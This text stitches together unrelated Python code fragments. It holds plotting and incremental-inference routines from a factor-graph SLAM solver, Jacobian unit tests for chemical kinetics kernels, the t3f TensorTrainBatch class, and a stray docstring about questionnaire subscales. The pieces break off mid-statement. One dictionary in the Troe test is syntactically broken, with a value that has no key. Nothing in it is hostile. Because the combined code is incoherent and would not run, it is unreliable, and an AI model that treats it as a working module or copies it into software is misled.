end = time.time()
if timer is not None:
timer.append(end - start)
return samples
def plot2d_posterior(self, title: str = None, xlim=None, ylim=None,
marker_size: float = 1, if_legend: bool = False):
# xlim and ylim are tuples
vars = self._elimination_ordering
# list(self._samples.keys())
len_var = len(vars)
for i in range(len_var):
cur_sample = self._samples[vars[i]]
plt.scatter(cur_sample[:, 0], cur_sample[:, 1], marker=".",
s=marker_size)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
if if_legend:
plt.legend([var.name for var in vars])
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
plt.title(title)
fig_handle = plt.gcf()
plt.show()
return fig_handle
def results(self):
return list(self._samples.values()), list(self._samples.keys())
def plot2d_mean_points(self, title: str = None, xlim=None, ylim=None,
if_legend: bool = False):
# xlim and ylim are tuples
vars = self._elimination_ordering
# list(self._samples.keys())
len_var = len(vars)
x_list = []
y_list = []
for i in range(len_var):
cur_sample = self._samples[vars[i]]
x = np.mean(cur_sample[:, 0])
y = np.mean(cur_sample[:, 1])
x_list.append(x)
y_list.append(y)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.plot(x_list, y_list)
if if_legend:
plt.legend([var.name for var in vars])
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
plt.title(title)
fig_handle = plt.gcf()
plt.show()
return fig_handle
def plot2d_mean_rbt_only(self, title: str = None, xlim=None, ylim=None,
if_legend: bool = False, fname=None, front_size=None, show_plot=False, **kwargs):
# xlim and ylim are tuples
vars = self._elimination_ordering
# list(self._samples.keys())
len_var = len(vars)
x_list = []
y_list = []
lmk_list = []
for i in range(len_var):
if vars[i]._type == VariableType.Landmark:
lmk_list.append(vars[i])
else:
cur_sample = self._samples[vars[i]]
x = np.mean(cur_sample[:, 0])
y = np.mean(cur_sample[:, 1])
x_list.append(x)
y_list.append(y)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.plot(x_list, y_list)
for var in lmk_list:
cur_sample = self._samples[var]
plt.scatter(cur_sample[:, 0], cur_sample[:, 1], label=var.name)
if if_legend:
if front_size is not None:
plt.legend(fontsize=front_size)
else:
plt.legend()
if front_size is not None:
plt.xlabel('x (m)', fontsize=front_size)
plt.ylabel('y (m)', fontsize=front_size)
else:
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
if front_size is not None:
plt.title(title, fontsize=front_size)
else:
plt.title(title)
fig_handle = plt.gcf()
if fname is not None:
plt.savefig(fname)
if show_plot:
plt.show()
return fig_handle
def plot2d_MAP_rbt_only(self, title: str = None, xlim=None, ylim=None,
if_legend: bool = False, fname=None, front_size=None):
# xlim and ylim are tuples
vars = self._elimination_ordering
jf = JointFactor(self.physical_factors, vars)
# list(self._samples.keys())
all_sample = sample_dict_to_array(self._samples, vars)
log_pdf = jf.log_pdf(all_sample)
max_idx = np.argmax(log_pdf)
map_sample = all_sample[max_idx:max_idx+1]
map_sample_dict = array_order_to_dict(map_sample, vars)
len_var = len(vars)
x_list = []
y_list = []
lmk_list = []
for i in range(len_var):
if vars[i]._type == VariableType.Landmark:
lmk_list.append(vars[i])
else:
cur_sample = map_sample_dict[vars[i]]
x = np.mean(cur_sample[:, 0])
y = np.mean(cur_sample[:, 1])
x_list.append(x)
y_list.append(y)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.plot(x_list, y_list)
for var in lmk_list:
cur_sample = map_sample_dict[var]
plt.scatter(cur_sample[:, 0], cur_sample[:, 1], label=var.name)
if if_legend:
if front_size is not None:
plt.legend(fontsize=front_size)
else:
plt.legend()
if front_size is not None:
plt.xlabel('x (m)', fontsize=front_size)
plt.ylabel('y (m)', fontsize=front_size)
else:
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
if front_size is not None:
plt.title(title, fontsize=front_size)
else:
plt.title(title)
fig_handle = plt.gcf()
if fname is not None:
plt.savefig(fname)
plt.show()
return fig_handle
def plot2d_mean_poses(self, title: str = None, xlim=None, ylim=None,
width: float = 0.05, if_legend: bool = False):
# xlim and ylim are tuples
vars = self._elimination_ordering
# list(self._samples.keys())
len_var = len(vars)
x_list = []
y_list = []
for i in range(len_var):
cur_sample = self._samples[vars[i]]
x = np.mean(cur_sample[:, 0])
y = np.mean(cur_sample[:, 1])
x_list.append(x)
y_list.append(y)
# th_mean = circmean(cur_sample[:,2])
# dx, dy = np.cos(th_mean), np.sin(th_mean)
# plt.arrow(x-dx/2, y-dy/2, dx, dy,
# head_width=4*width,
# width=0.05)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.plot(x_list, y_list)
if if_legend:
plt.legend([var.name for var in vars])
plt.xlabel('x (m)')
plt.ylabel('y (m)')
if title is not None:
plt.title(title)
fig_handle = plt.gcf()
plt.show()
return fig_handle
def plot_factor_graph(self):
pass
def plot_bayes_tree(self):
pass
def run_incrementally(case_dir: str, solver: FactorGraphSolver, nodes_factors_by_step, truth=None, traj_plot=False,
plot_args=None, check_root_transform=False) -> None:
run_count = 1
while os.path.exists(f"{case_dir}/run{run_count}"):
run_count += 1
os.mkdir(f"{case_dir}/run{run_count}")
run_dir = f"{case_dir}/run{run_count}"
print("create run dir: " + run_dir)
file = open(f"{run_dir}/parameters", "w+")
params = solver._args.jsonStr()
print(params)
file.write(params)
file.close()
num_batches = len(nodes_factors_by_step)
observed_nodes = []
step_timer = []
step_list = []
posterior_sampling_timer = []
fitting_timer = []
mixture_factor2weights = {}
show_plot = True
if "show_plot" in plot_args and not plot_args["show_plot"]:
show_plot = False
for i in range(num_batches):
step_nodes, step_factors = nodes_factors_by_step[i]
for node in step_nodes:
solver.add_node(node)
for factor in step_factors:
solver.add_factor(factor)
if isinstance(factor, BinaryFactorMixture):
mixture_factor2weights[factor] = []
observed_nodes += step_nodes
step_list.append(i)
step_file_prefix = f"{run_dir}/step{i}"
detailed_timer = []
clique_dim_timer = []
start = time.time()
solver.update_physical_and_working_graphs(timer=detailed_timer)
cur_sample = solver.incremental_inference(timer=detailed_timer, clique_dim_timer=clique_dim_timer)
end = time.time()
step_timer.append(end - start)
print(f"step {i}/{num_batches} time: {step_timer[-1]} sec, "
| |
# set up args and parameters
phi = self.store.phi_cp if conp else self.store.phi_cv
args = {'phi': lambda x: np.array(phi, order=x, copy=True),
'kf': lambda x: np.zeros_like(self.store.fwd_rate_constants,
order=x)}
opts = loopy_options(order='C', lang='c')
namestore = arc.NameStore(opts, rate_info, True, self.store.test_size)
# get kf
runner = kernel_runner(get_simple_arrhenius_rates,
self.store.test_size, args)
kf = runner(opts, namestore, self.store.test_size)['kf']
if self.store.ref_Pr.size:
args = {'phi': lambda x: np.array(phi, order=x, copy=True),
'kf_fall': lambda x: np.zeros_like(self.store.ref_Fall, order=x)}
# get kf_fall
runner = kernel_runner(get_simple_arrhenius_rates,
self.store.test_size, args,
{'falloff': True})
kf_fall = runner(opts, namestore, self.store.test_size)['kf_fall']
else:
kf_fall = None
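# If the mechanism contains PLOG or Chebyshev reactions, the entries of `kf`
# for those reactions are overwritten below with the pressure-dependent
# evaluations (constant-pressure runs additionally pass the pressure array).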
if namestore.num_plog is not None:
args = {'phi': lambda x: np.array(phi, order=x, copy=True),
'kf': lambda x: np.array(kf, order=x, copy=True)}
if conp:
args['P_arr'] = lambda x: np.array(
self.store.P, order=x, copy=True)
# get plog
runner = kernel_runner(_get_plog_call_wrapper(rate_info),
self.store.test_size, args)
kf = runner(opts, namestore, self.store.test_size)['kf']
if namestore.num_cheb is not None:
args = {'phi': lambda x: np.array(phi, order=x, copy=True),
'kf': lambda x: np.array(kf, order=x, copy=True)}
if conp:
args['P_arr'] = lambda x: np.array(
self.store.P, order=x, copy=True)
# get plog
runner = kernel_runner(_get_cheb_call_wrapper(rate_info),
self.store.test_size, args)
kf = runner(opts, namestore, self.store.test_size)['kf']
return kf, kf_fall
def __get_kr(self, kf):
reacs = self.store.reacs
specs = self.store.specs
rate_info = determine_jac_inds(reacs, specs, RateSpecialization.fixed)
args = {
'kf': lambda x: np.array(kf, order=x, copy=True),
'b': lambda x: np.array(
self.store.ref_B_rev, order=x, copy=True)}
opts = loopy_options(order='C', lang='c')
namestore = arc.NameStore(opts, rate_info, True, self.store.test_size)
allint = {'net': rate_info['net']['allint']}
# get kf
runner = kernel_runner(get_rev_rates,
self.store.test_size, args, {'allint': allint})
kr = runner(opts, namestore, self.store.test_size)['kr']
return kr
def __get_db(self):
reacs = self.store.reacs
specs = self.store.specs
rate_info = determine_jac_inds(reacs, specs, RateSpecialization.fixed)
opts = loopy_options(order='C', lang='c')
namestore = arc.NameStore(opts, rate_info, True, self.store.test_size)
# need dBk/dT
args = {
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True),
}
def __call_wrapper(loopy_opts, namestore, test_size):
return thermo_temperature_derivative(
'db',
loopy_opts, namestore,
test_size)
# get db
runner = kernel_runner(__call_wrapper, self.store.test_size, args)
return runner(opts, namestore, self.store.test_size)['db']
@attr('long')
@with_check_inds(check_inds={
1: lambda self: self.__get_dci_check(
lambda rxn: isinstance(rxn, ct.FalloffReaction) and
rxn.falloff.type == 'Simple'),
2: lambda self: 2 + np.arange(self.store.gas.n_species - 1)
})
def test_dci_lind_dnj(self):
# test conp
namestore, rate_info = self._make_namestore(True)
ad_opts = namestore.loopy_opts
# set up arguements
allint = {'net': rate_info['net']['allint']}
fwd_removed, rev_removed = self.__get_removed()
# setup arguements
# create the editor
edit = editor(
namestore.n_arr, namestore.n_dot, self.store.test_size,
order=ad_opts.order, skip_on_missing=get_lind_kernel)
kf, kf_fall = self.__get_kf_and_fall()
args = {'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'pres_mod': lambda x: np.zeros_like(
self.store.ref_pres_mod, order=x),
'rop_net': lambda x: np.zeros_like(
self.store.rxn_rates, order=x),
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True),
'P_arr': lambda x: np.array(
self.store.P, order=x, copy=True),
'conc': lambda x: np.zeros_like(
self.store.concs, order=x),
'wdot': lambda x: np.zeros_like(
self.store.species_rates, order=x),
'thd_conc': lambda x: np.zeros_like(
self.store.ref_thd, order=x),
'Fi': lambda x: np.zeros_like(self.store.ref_Fall, order=x),
'Pr': lambda x: np.zeros_like(self.store.ref_Pr, order=x),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
}
# obtain the finite difference jacobian
kc = kernel_call('dci_lind_nj', [None], **args)
fd_jac = self._get_jacobian(
get_molar_rates, kc, edit, ad_opts, True,
extra_funcs=[get_concentrations, get_thd_body_concs,
get_reduced_pressure_kernel, get_lind_kernel,
get_rxn_pres_mod, get_rop_net,
get_spec_rates],
do_not_set=[namestore.conc_arr, namestore.spec_rates,
namestore.rop_net, namestore.Fi],
allint=allint)
# setup args
args = {
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'Fi': lambda x: np.array(
self.store.ref_Fall, order=x, copy=True),
'pres_mod': lambda x: np.array(
self.store.ref_pres_mod, order=x, copy=True),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
}
def _chainer(self, out_vals):
self.kernel_args['jac'] = out_vals[-1][0].copy(
order=self.current_order)
# and get mask
comp = self._get_compare(fd_jac)
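# Sketch of the comparison pattern used below: the first kernel_call runs
# 'dci_lind_dnj' with check=False only to populate the jacobian; _chainer then
# carries that jacobian into the chained '_ns' call, whose entries are compared
# against the finite-difference reference through `comp`.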
kc = [kernel_call('dci_lind_dnj', comp.ref_answer, check=False,
strict_name_match=True, **args),
kernel_call('dci_lind_dnj_ns', comp.ref_answer, compare_mask=[comp],
compare_axis=comp.compare_axis, chain=_chainer,
strict_name_match=True, allow_skip=True, **args)]
return self._generic_jac_tester(dci_lind_dnj, kc)
def __get_sri_params(self, namestore):
sri_args = {'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True)}
runner = kernel_runner(get_sri_kernel, self.store.test_size, sri_args)
opts = loopy_options(order='C', lang='c')
X = runner(opts, namestore, self.store.test_size)['X']
return X
@attr('long')
@with_check_inds(check_inds={
# find non-NaN SRI entries for testing
# NaN entries will be handled by :func:`nan_compare`
0: lambda self: np.where(np.all(
self.store.ref_Pr[:, self.store.sri_to_pr_map] != 0.0, axis=1))[0],
1: lambda self: self.__get_dci_check(
lambda rxn: isinstance(rxn, ct.FalloffReaction) and
rxn.falloff.type == 'SRI'),
2: lambda self: 2 + np.arange(self.store.gas.n_species - 1)
})
def test_dci_sri_dnj(self):
# test conp
namestore, rate_info = self._make_namestore(True)
ad_opts = namestore.loopy_opts
# set up arguements
allint = {'net': rate_info['net']['allint']}
# get our form of rop_fwd / rop_rev
fwd_removed, rev_removed = self.__get_removed()
# setup arguements
# create the editor
edit = editor(
namestore.n_arr, namestore.n_dot, self.store.test_size,
order=ad_opts.order, skip_on_missing=get_sri_kernel)
if not rate_info['fall']['sri']['num']:
raise SkipTest('No SRI reactions in mechanism {}'.format(
self.store.gas.name))
# get kf / kf_fall
kf, kf_fall = self.__get_kf_and_fall()
# create X
X = self.__get_sri_params(namestore)
args = {
'pres_mod': lambda x: np.zeros_like(
self.store.ref_pres_mod, order=x),
'thd_conc': lambda x: np.array(
self.store.ref_thd, order=x, copy=True),
'Fi': lambda x: np.zeros_like(self.store.ref_Fall, order=x),
'Pr': lambda x: np.array(self.store.ref_Pr, order=x, copy=True),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
'X': lambda x: np.zeros_like(X, order=x),
'phi': lambda x: np.array(self.store.phi_cp, order=x, copy=True),
'P_arr': lambda x: np.array(self.store.P, order=x, copy=True),
'conc': lambda x: np.zeros_like(self.store.concs, order=x),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
'wdot': lambda x: np.zeros_like(self.store.species_rates, order=x),
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'rop_net': lambda x: np.zeros_like(self.store.rxn_rates, order=x)
}
# obtain the finite difference jacobian
kc = kernel_call('dci_sri_nj', [None], **args)
fd_jac = self._get_jacobian(
get_molar_rates, kc, edit, ad_opts, True,
extra_funcs=[get_concentrations, get_thd_body_concs,
get_reduced_pressure_kernel, get_sri_kernel,
get_rxn_pres_mod, get_rop_net, get_spec_rates],
do_not_set=[namestore.conc_arr, namestore.Fi, namestore.X_sri,
namestore.thd_conc],
allint=allint)
# setup args
args = {
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'Fi': lambda x: np.array(
self.store.ref_Fall, order=x, copy=True),
'pres_mod': lambda x: np.array(
self.store.ref_pres_mod, order=x, copy=True),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
'X': lambda x: np.array(X, order=x, copy=True),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True)
}
def _chainer(self, out_vals):
self.kernel_args['jac'] = out_vals[-1][0].copy(
order=self.current_order)
# and get mask
comp = self._get_compare(fd_jac)
kc = [kernel_call('dci_sri_dnj', comp.ref_answer, check=False,
strict_name_match=True, **args),
kernel_call('dci_sri_dnj_ns', comp.ref_answer,
compare_mask=[comp],
compare_axis=comp.compare_axis, chain=_chainer,
strict_name_match=True, allow_skip=True,
other_compare=self.nan_compare, rtol=5e-4, **args)]
return self._generic_jac_tester(dci_sri_dnj, kc)
def __get_troe_params(self, namestore):
troe_args = {'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'phi': lambda x: np.array(
self.store.phi_cp, order=x, copy=True)}
runner = kernel_runner(
get_troe_kernel, self.store.test_size, troe_args)
opts = loopy_options(order='C', lang='c')
Fcent, Atroe, Btroe = [runner(
opts, namestore, self.store.test_size)[x] for x in
['Fcent', 'Atroe', 'Btroe']]
return Fcent, Atroe, Btroe
@attr('long')
@with_check_inds(check_inds={
# find non-NaN Troe entries for testing
# NaN entries will be handled by :func:`nan_compare`
0: lambda self: np.where(np.all(
self.store.ref_Pr[:, self.store.troe_to_pr_map] != 0.0, axis=1))[0],
1: lambda self: self.__get_dci_check(
lambda rxn: isinstance(rxn, ct.FalloffReaction) and
rxn.falloff.type == 'Troe'),
2: lambda self: 2 + np.arange(self.store.gas.n_species - 1)
})
def test_dci_troe_dnj(self):
# test conp
namestore, rate_info = self._make_namestore(True)
ad_opts = namestore.loopy_opts
# set up arguements
allint = {'net': rate_info['net']['allint']}
# get our form of rop_fwd / rop_rev
fwd_removed, rev_removed = self.__get_removed()
# setup arguements
# create the editor
edit = editor(
namestore.n_arr, namestore.n_dot, self.store.test_size,
order=ad_opts.order, skip_on_missing=get_troe_kernel)
if not rate_info['fall']['troe']['num']:
raise SkipTest('No Troe reactions in mechanism {}'.format(
self.store.gas.name))
# get kf / kf_fall
kf, kf_fall = self.__get_kf_and_fall()
Fcent, Atroe, Btroe = self.__get_troe_params(namestore)
args = {
'pres_mod': lambda x: np.zeros_like(
self.store.ref_pres_mod, order=x),
'thd_conc': lambda x: np.array(
self.store.ref_thd, order=x, copy=True),
'Fi': lambda x: np.zeros_like(self.store.ref_Fall, order=x),
'Pr': lambda x: np.array(self.store.ref_Pr, order=x, copy=True),
'phi': lambda x: np.array(self.store.phi_cp, order=x, copy=True),
'P_arr': lambda x: np.array(self.store.P, order=x, copy=True),
'conc': lambda x: np.zeros_like(self.store.concs, order=x),
'wdot': lambda x: np.zeros_like(self.store.species_rates, order=x),
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'rop_net': lambda x: np.zeros_like(self.store.rxn_rates, order=x),
'jac': lambda x: np.zeros(namestore.jac.shape, order=x),
'kf': lambda x: np.array(kf, order=x, copy=True),
'kf_fall': lambda x: np.array(kf_fall, order=x, copy=True),
'Atroe': lambda x: np.zeros_like(Atroe, order=x),
'Btroe': lambda x: np.zeros_like(Btroe, order=x),
'Fcent': lambda x: np.zeros_like(Fcent, order=x)
}
# obtain the finite difference jacobian
kc = kernel_call('dci_sri_nj', [None], **args)
fd_jac = self._get_jacobian(
get_molar_rates, kc, edit, ad_opts, True,
extra_funcs=[get_concentrations, get_thd_body_concs,
get_reduced_pressure_kernel, get_troe_kernel,
get_rxn_pres_mod, get_rop_net, get_spec_rates],
do_not_set=[namestore.conc_arr, namestore.Fi, namestore.Atroe,
namestore.Btroe, namestore.Fcent, namestore.thd_conc],
allint=allint)
# setup args
args = {
'rop_fwd': lambda x: np.array(
fwd_removed, order=x, copy=True),
'rop_rev': lambda x: np.array(
rev_removed, order=x, copy=True),
'Pr': lambda x: np.array(
self.store.ref_Pr, order=x, copy=True),
'Fi': lambda x: np.array(
self.store.ref_Fall, order=x, copy=True),
self.store.ref_pres_mod, order=x, copy=True),
import numpy as np
import tensorflow as tf
from t3f.tensor_train_base import TensorTrainBase
from t3f.tensor_train import TensorTrain
from t3f import shapes
class TensorTrainBatch(TensorTrainBase):
"""Represents a batch of Tensor Train objects (TT-tensors or TT-matrices).
t3f represents a Tensor Train object as a tuple of TT-cores.
"""
def __init__(self, tt_cores, shape=None, tt_ranks=None, batch_size=None,
convert_to_tensors=True):
"""Creates a `TensorTrainBatch`.
Args:
tt_cores: A tuple of 4d or 5d tensor-like objects of shape
`[batch_size, r_k-1, n_k, r_k]` or
`[batch_size, r_k-1, n_k, m_k, r_k]`
Tensor-like can be numpy array, tf.Tensor, of tf.Variable
batch_size: number of elements in the batch. If None, tries to infer from
the TT-cores (not always possible even if it should be, e.g. if ranks
are unknown, than the whole shape of a core can be unknown).
shape: Shape of the underlying tensor. If None, tries to infer from the
TT-cores.
tt_ranks: a TensorShape of length d+1 (d is the dimensionality of
the underlying tensor). The first and the last ranks are assumed to
equal to 1. If None, tries to infer the ranks from the cores.
convert_to_tensors: bool, if True than convert each element of the
tt_cores tuple into a tf.Tensor (e.g. to initialize from np.array)
Returns:
A `TensorTrainBatch`.
Raises:
ValueError if the provided TT-cores are not valid or inconsistent with
the provided shape.
"""
tt_cores = list(tt_cores)
if convert_to_tensors:
# TODO: what does this namescope do?
with tf.name_scope("TensorTrainBatch", tt_cores):
for i in range(len(tt_cores)):
name = "core%d" % i
tt_cores[i] = tf.convert_to_tensor(tt_cores[i], name=name)
if not _are_batch_tt_cores_valid(tt_cores, shape, tt_ranks, batch_size):
raise ValueError('The tt_cores provided to TensorTrainBatch constructor '
'are not valid, have different dtypes, or are '
'inconsistent with the provided batch_size, shape, or '
'TT-ranks.')
self._tt_cores = tuple(tt_cores)
if batch_size is None:
self._batch_size = tt_cores[0].get_shape()[0].value
else:
self._batch_size = batch_size
self._raw_shape = shapes.clean_raw_shape(shape)
if self._raw_shape is None:
self._raw_shape = _infer_batch_raw_shape(self._tt_cores)
self._tt_ranks = None if tt_ranks is None else tf.TensorShape(tt_ranks)
if self._tt_ranks is None:
self._tt_ranks = _infer_batch_tt_ranks(self._tt_cores)
def get_shape(self):
"""Get the `TensorShape` representing the shape of the dense tensor.
The first dimension is the batch_size.
Returns:
A `TensorShape` object.
"""
shape = TensorTrainBase.get_shape(self)
return tf.TensorShape(np.hstack((self.batch_size, shape)))
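# Example: for a batch of 5 TT-tensors, each representing a dense tensor of
# shape (2, 3, 4), get_shape() is equivalent to TensorShape([5, 2, 3, 4]).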
@property
def tt_cores(self):
"""A tuple of TT-cores.
Returns:
A tuple of 4d or 5d tensors shape
`[batch_size, r_k-1, n_k, r_k]`
or
`[batch_size, r_k-1, n_k, m_k, r_k]`
"""
return self._tt_cores
@property
def batch_size(self):
"""The number of elements or None if not known."""
return self._batch_size
@property
def left_tt_rank_dim(self):
"""The dimension of the left TT-rank in each TT-core."""
return 1
@property
def right_tt_rank_dim(self):
"""The dimension of the right TT-rank in each TT-core."""
if self.is_tt_matrix():
# The dimensions of each TT-core are
# [batch_idx, left_rank, n, m, right_rank]
return 4
else:
# The dimensions of each TT-core are
# [batch_idx, left_rank, n, right_rank]
return 3
def __str__(self):
"""A string describing the TensorTrainBatch, its TT-rank and shape."""
shape = self.get_shape()
tt_ranks = self.get_tt_ranks()
if self.batch_size is None:
batch_size_str = '(?)'
else:
batch_size_str = str(self.batch_size)
if self.is_tt_matrix():
raw_shape = self.get_raw_shape()
type_str = 'TT-matrix variables' if self.is_variable() else 'TT-matrices'
return "A %s element batch of %s of size %d x %d, underlying tensor " \
"shape: %s x %s, TT-ranks: %s" % (batch_size_str, type_str,
shape[1], shape[2],
raw_shape[0], raw_shape[1],
tt_ranks)
else:
if self.is_variable():
type_str = 'Tensor Train variables'
else:
type_str = 'Tensor Trains'
return "A %s element batch of %s of shape %s, TT-ranks: %s" % \
(batch_size_str, type_str, shape[1:], tt_ranks)
@staticmethod
def _do_collapse_dim(slice_spec):
# Returns true if slice_spec is specified exactly and we want to collapse
# the corresponding axis, i.e. return an object with less dims. To be used
# in indexing functions.
# If its a actual slice, nothing to collapse. Otherwise (a number or
# a tf.Tensor) want to collapse.
return not isinstance(slice_spec, slice)
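# Example: a[1] indexes the batch axis exactly, so that axis is collapsed and
# a TensorTrain is returned; a[1:2] keeps the axis and yields a
# TensorTrainBatch with batch_size 1.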
def _batch_dim_getitem(self, element_spec):
"""__getitem__ when provided only one (batch) index.
Examples:
a[1]
a[1:3]
"""
# This object index is specified exactly and we want to collapse the
# batch_size axis, i.e. return a TensorTrain instead of a TensorTrainBatch.
do_collapse_batch_dim = self._do_collapse_dim(element_spec)
new_tt_cores = []
for core_idx in range(self.ndims()):
curr_core = self.tt_cores[core_idx]
if self.is_tt_matrix():
new_tt_cores.append(curr_core[element_spec, :, :, :, :])
else:
new_tt_cores.append(curr_core[element_spec, :, :, :])
if do_collapse_batch_dim:
# This index is specified exactly and we want to collapse the batch_size
# axis, i.e. return a TensorTrain instead of a TensorTrainBatch.
return TensorTrain(new_tt_cores, self.get_raw_shape(),
self.get_tt_ranks())
else:
batch_size = new_tt_cores[0].get_shape()[0].value
return TensorTrainBatch(new_tt_cores, self.get_raw_shape(),
self.get_tt_ranks(), batch_size)
def _full_getitem(self, slice_spec):
"""__getitem__ when provided full index of length ndims + 1.
Examples:
a = t3f.random_tensor_batch((2, 3, 4), batch_size=5)
a[:3, 1:2, 4, :]
"""
if len(slice_spec) != self.ndims() + 1:
raise ValueError('Expected %d indices, got %d' % (self.ndims() + 1,
len(slice_spec)))
# This object index is specified exactly and we want to collapse the
# batch_size axis, i.e. return a TensorTrain instead of a TensorTrainBatch.
do_collapse_batch_dim = self._do_collapse_dim(slice_spec[0])
remainder = None
new_tt_cores = []
for core_idx in range(self.ndims()):
curr_core = self.tt_cores[core_idx]
if self.is_tt_matrix():
raise NotImplementedError
else:
sliced_core = curr_core[slice_spec[0], :, slice_spec[core_idx + 1], :]
do_collapse_curr_dim = self._do_collapse_dim(slice_spec[core_idx + 1])
if do_collapse_curr_dim:
# This index is specified exactly and we want to collapse this axis.
if remainder is None:
remainder = sliced_core
else:
if do_collapse_batch_dim:
remainder = tf.einsum('ab,bd->ad', remainder, sliced_core)
else:
remainder = tf.einsum('oab,obd->oad', remainder, sliced_core)
else:
if remainder is not None:
# Add the remainder from the previously collapsed cores to the current
# core.
if do_collapse_batch_dim:
sliced_core = tf.einsum('ab,bid->aid', remainder, sliced_core)
else:
sliced_core = tf.einsum('oab,obid->oaid', remainder,
sliced_core)
remainder = None
new_tt_cores.append(sliced_core)
if remainder is not None:
# The remainder obtained from collapsing the last cores.
if do_collapse_batch_dim:
new_tt_cores[-1] = tf.einsum('aib,bd->aid', new_tt_cores[-1],
remainder)
else:
new_tt_cores[-1] = tf.einsum('oaib,obd->oaid', new_tt_cores[-1],
remainder)
remainder = None
# TODO: infer the output ranks and shape.
if do_collapse_batch_dim:
return TensorTrain(new_tt_cores)
else:
return TensorTrainBatch(new_tt_cores)
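# Illustration (not part of the library): when a mode index in slice_spec is given
# exactly, the sliced core reduces to a left_rank x right_rank matrix per batch
# element, and _full_getitem folds it into the neighbouring core with einsum.
# A minimal NumPy sketch with made-up shapes:
#
#     import numpy as np
#     remainder = np.random.rand(5, 1, 2)      # batch 5, ranks (1, 2), mode collapsed
#     next_core = np.random.rand(5, 2, 4, 3)   # batch 5, ranks (2, 3), mode size 4
#     np.einsum('oab,obid->oaid', remainder, next_core).shape  # -> (5, 1, 4, 3)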
def __getitem__(self, slice_spec):
"""Basic indexing, returns a `TensorTrainBatch` with the specified region.
Examples:
>>> a = t3f.random_tensor_batch((2, 3, 4), batch_size=5)
>>> a[1:3, :, :, :]
is a 3D TensorTrainBatch 2 x 3 x 4 with batch_size = 2.
>>> a[1:3]
the same as above, a 3D TensorTrainBatch 2 x 3 x 4 with batch_size = 2.
>>> a[1, :, :, :]
is a 3D TensorTrain 2 x 3 x 4.
>>> a[1]
the same as above, a 3D TensorTrain 2 x 3 x 4.
>>> a[1:3, :, 1, :]
is a 2D TensorTrainBatch 2 x 4 with batch_size = 2.
>>> a[1, :, 1, :]
is a 2D TensorTrain 2 x 4.
Returns:
`TensorTrainBatch` or `TensorTrain` depending on whether the first
(batch) dim was specified as a range or as a number.
"""
try:
slice_only_batch_dim = len(slice_spec) == 1
except TypeError:
# The argument is not iterable, so it's a single slice, or a number, or a
# tf.Tensor with a number.
slice_only_batch_dim = True
if slice_only_batch_dim:
# Indexing only for the batch_size axis, e.g. a[1:3].
return self._batch_dim_getitem(slice_spec)
elif len(slice_spec) == self.ndims() + 1:
return self._full_getitem(slice_spec)
else:
raise ValueError('TensorTrainBatch.__getitem__: wrong number of '
'dimensions, expected 1 or %d, got %d' %
(self.ndims() + 1, len(slice_spec)))
def _are_batch_tt_cores_valid(tt_cores, shape, tt_ranks, batch_size):
"""Check if dimensions of the TT-cores are consistent and the dtypes coincide.
Args:
tt_cores: a tuple of `Tensor` objects
shape: An np.array, a tf.TensorShape (for tensors), a tuple of
tf.TensorShapes (for TT-matrices or tensors), or None
tt_ranks: An np.array or a tf.TensorShape of length len(tt_cores)+1.
batch_size: a number or None
Returns:
boolean, True if the dimensions and dtypes are consistent.
"""
shape = shapes.clean_raw_shape(shape)
num_dims = len(tt_cores)
for core_idx in range(1, num_dims):
if tt_cores[core_idx].dtype != tt_cores[0].dtype:
return False
try:
for core_idx in range(num_dims):
curr_core_shape = tt_cores[core_idx].get_shape()
if len(curr_core_shape) != len(tt_cores[0].get_shape()):
# Shapes are inconsistent.
return False
if batch_size is not None and curr_core_shape[0].value is not None:
if curr_core_shape[0].value != batch_size:
# The TT-cores are not aligned with the given batch_size.
return False
if shape is not None:
for i in range(len(shape)):
if curr_core_shape[i + 2] != shape[i][core_idx]:
# The TT-cores are not aligned with the given shape.
return False
if core_idx >= 1:
prev_core_shape = tt_cores[core_idx - 1].get_shape()
| |
are not in the correct order or if a complete dataframe is
passed as ``data``.
subscales : dict, optional
A dictionary with subscale names (keys) and column names or column indices (count-by-1) (values)
if only specific subscales should be computed.
Returns
-------
:class:`~pandas.DataFrame`
